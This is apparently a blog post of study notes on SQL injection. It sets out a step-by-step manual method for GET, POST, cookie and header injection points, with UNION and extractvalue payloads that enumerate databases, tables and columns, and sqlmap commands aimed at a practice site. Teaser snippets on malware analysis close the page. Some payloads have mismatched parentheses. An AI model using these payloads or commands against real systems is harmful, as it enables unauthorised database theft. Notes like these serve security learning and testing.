SQL injection Manual method & automation method of Exploitation:

SQL injection Manual method & automation method of Exploitation:

SQL-Injection:
              Finding the injection point.
              Finding the query vulnerability.{ ', " , \ , ') , ") }
              Fixing & balancing the query.
              Exploiting the database.           
              
Injection point:
                                     GET 
                                     POST 
                                     COOKIES 
                                     HEADER 
GET Method:
                 Attacker use to attack using URL parameter.
 Step 1: Identify the injection point.
                 Step 2: Balance the query. (--+ used to balance the query)
                 Step 3: Identify the number of col in given table (order by using n-1).
                 Step 4: Identify the vulnerable col. (using union all select 1,2,3)
                 Step 5: Exploitation of database.

1. How to identify the database name,table name, col data in Get based SQLI Manual method?

Step 1: Identify the injection point.
Step 2: Balance the query. (--+ used to balance the query)
Step 3: Identify the number of col in given table (order by using n-1).
Step 4: Identify the vulnerable col. (using union all select 1,2,3)
Step 5: To identify the current database name:
                    use the database() in the vul col.
          1) To identify all the databases in the given table.
                    Using the schema_name function we can identify the database name present on the table.
                    EX: select GROUP_CONCAT(schema_name SEPARATOR',') From information_schema.schemata 
                    output: leettime_761wHole
          2)To identify all tables in the database   
                    Using TABLE_NAME function we can identify all the tables in a particular database.                
                    Syntax: 
                        select GROUP_CONCAT(TABLE_NAME SEPARATOR',')FROM information_schema.tables where table_schema = "DATABASE_NAME"  
                    EX: select GROUP_CONCAT(TABLE_NAME SEPARATOR',')FROM information_schema.tables where table_schema = "leettime_761wHole"  
          3)To identify all the col in the given all table in the database
                    Syntax:
                       select GROUP_CONCAT(column_name SEPARATOR',')from information_schema.columns where table_schema = "DATABASE_NAME"

                    EX: select GROUP_CONCAT(column_name SEPARATOR',')from information_schema.columns where table_schema = "leettime_761wHole"

How to identify the database name,table name, col data in Get based SQLI Manual method?

CMD:

Extracting tables: 
sqlmap -u http://www.leettime.net/sqlninja.com/tasks/deathrow_ch3.php?id=1 -D “particular_DB_NAME” --tables

Extracting database: 

Extracting col: 
sqlmap -u http://www.leettime.net/sqlninja.com/tasks/deathrow_ch3.php?id=1 -D “particular_DB_NAME” --columns

Double Query situation:
                    "order by" work by union operation not work.
How to extract the data in database in double query situation?
  1) To identify all the databases in the given table.
                    Using the schema_name function we can identify the database name present on the table.
                    EX: extractvalue(0x0a,(select GROUP_CONCAT(schema_name SEPARATOR',') From information_schema.schemata))  
                    output: leettime_761wHole
          2)To identify all tables in the database   
                    Using TABLE_NAME function we can identify all the tables in a particular database.                
                    Syntax: 
                        extractvalue(0x0a,select GROUP_CONCAT(TABLE_NAME SEPARATOR',')FROM information_schema.tables where table_schema = "DATABASE_NAME"  ))
                    EX: select GROUP_CONCAT(TABLE_NAME SEPARATOR',')FROM information_schema.tables where table_schema = "leettime_761wHole"  
          3)To identify all the col in the given all table in the database
                    Syntax:
                       extractvalue(0x0a,select GROUP_CONCAT(column_name SEPARATOR',')from information_schema.columns where table_schema = "DATABASE_NAME"))

                    EX:extractvalue(0x0a, select GROUP_CONCAT(column_name SEPARATOR',')from information_schema.columns where table_schema = "leettime_761wHole"))


What is XPATH & how to retrieve the data in xpath ?
 Using extractValue() function we can extract the data in a double query situation.
  • MySQL extractValue function retrieves data from an attribute that contains XML data
  • first argument is the attribute name, e.g., doc
  • second argument is an XPath expression enclosed in single quotes
  • e.g.
    select extractValue(doc,'/book/title') as Title from x;
POST Method:
                 Attacker use any html form that execute sql query .
 Step 1: Identify the injection point.
                 Step 2: Balance the query. (-- used to balance the query)
                 Step 3: Identify the number of col in given table (order by using n-1).
                 Step 4: Identify the vulnerable col. (using union all select 1,2,3)
                 Step 5: Exploitation of database.

COOKIE Method:
                 Attacker has to find the cookie parameter .
 Step 1: Identify the injection point using "\".
                 Step 2: Balance the query. (-- or { #} used to balance the query)
                 Step 3: Identify the number of col in given table (order by using n-1).
                 Step 4: Identify the vulnerable col. (using union all select 1,2,3)

                 Step 5: Exploitation of database.

HEADER Method:
                 Attacker has to find the Header parameter.such as user-agent | referrer | User-agent | Location | Host
 Step 1: Identify the injection point.
                 Step 2: Balance the query. (--+ used to balance the query)
                 Step 3: Identify the number of col in given table (order by using n-1).
                 Step 4: Identify the vulnerable col. (using union all select 1,2,3)

                 Step 5: Exploitation of database.

Comments

Post a Comment

Popular posts from this blog

System Malware Analysis

What is Malware ?                           Malware is a code that performs malicious actions; it can take the form of an executable,script, code, or any other software. Attackers use malware to steal sensitive information, spy on the infected system, or take control of the system. It typically gets into your system without your consent and can be delivered via various communication channels such as email, web, or USB drives. The following are some of the malicious actions performed by malware: Disrupting computer operations Stealing sensitive information, including personal, business, and financial data Unauthorized access to the victim's system Spying on the victims Sending spam emails Engaging in distributed-denial-of-service attacks (DDOS) Locking up the files on the computer and holding them for ransom Types of Malware  Botnets Ransomware Rootkits Trojans Viruses Worms Adware sp...
Read more

Malware Sample Analysis (29F228F3375C489A8A6E31203AB25787)

Image
File hash: MD5 : 29F228F3375C489A8A6E31203AB25787 Sha1 : 14D713A5C8A2FC01FA2F01D993A249B9FB292810 Sha256: EC905CB2CB8E9F74790ADDE2C138807F3A6CDBECD5735FA5035B547280D7DB79 Note : cmd are mentioned in blue.Imp data marked as "purple". Basic Static Analysis: Determine the file type: Using file command:   test$ file Unknown Unknown: PE32 executable (console) Intel 80386, for MS Windows Using File Signature: Test$ hexdump Unknown  0000000 5a4d 0090 0003 0000 0004 0000 ffff 0000 0000010 00b8 0000 0000 0000 0040 0000 0000 0000 0000020 0000 0000 0000 0000 0000 0000 0000 0000 0000030 0000 0000 0000 0000 0000 0000 00d8 0000 0000040 1f0e 0eba b400 cd09 b821 4c01 21cd 6854 0000050 7369 7020 6f72 7267 6d61 6320 6e61 6f6e 0000060 2074 6562 7220 6e75 6920 206e 4f44 2053 0000070 6f6d 6564 0d2e 0a0d 0024 0000 0000 0000 0000080 4be3 9a53 2aa7 c93d 2aa7 c93d 2aa7 c93d 0000090 b7bc c9a3 2aa6 c93d b7bc c997 2aa1 c93d 00000a0 52ae c9ae 2aa2 c93d 2aa7 c93c 2ab5 c93d 00000b0 b7bc c992 2aa6 c93d ...
Read more

Static Analysis

Image
Static Analysis                                          Examine the executable file without viewing the actual instruction. Try to figure out what the malware is trying to do and the commands it is attempting to execute. Identifying the File type Extracting the String Analysis binary with Virus Total   Determining Obfuscation of binary   Examine the PE header Malware Sources:                          Once you have a lab set up, you will need malware samples for performing analysis.The following are some of the sources from where you can get malware samples for your analysis.             ...
Read more